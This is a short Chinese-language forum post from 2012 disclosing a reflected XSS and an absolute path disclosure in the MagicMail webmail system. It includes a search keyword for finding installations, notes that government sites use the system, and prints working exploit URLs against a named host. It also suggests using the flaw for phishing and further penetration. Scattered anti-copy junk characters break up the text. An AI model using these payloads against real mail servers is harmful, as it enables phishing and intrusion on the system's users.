找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1938|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞4 v/ `7 v" s! a' Q; z
6 y1 i8 V' p0 N# |3 d

+ l1 a; w" @' v0 H: j* a包含  一个反射性XSS  以及  绝对路径泄漏
/ X3 |" X: X- F1 L. ~看了看 貌似全部是linux的。. G& g+ Q7 f% h0 k2 j; S
$ b( i: w) w4 F% H, i$ v" s
关键字:迈捷邮件系统 by MagicMail, o( q- u% }! a9 d# y
- d  t0 \4 z  K+ h
可以看到很多政府网站都用这个邮件系统0 m4 Q* {1 e+ \+ Y7 V) v7 X

! l% U' M8 b  X7 }8 E) V2 r1 y! J绝对路径 http://madman.in/index.php?login_type=declare&language=
0 P5 g" a: M* w3 j& Y; k5 a: C0 {6 E! `& b
8 v0 x! G  l! f$ f6 R5 h
$ {, H, G0 {- v7 O. B
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
$ H7 g1 L( W% W6 n
0 Y9 \  E/ y9 V# F- K7 `; f. T0 H0 _6 T8 f* l) k! c2 Z  J! ~  |5 r
6 A: d  d+ X% \; O1 p
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
1 @1 L$ `) {/ s( y# G
) H& g0 q  s$ |6 J# ?0 c6 G修复方案:看官方补丁吧。
$ o) I9 Q" J- Q: {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表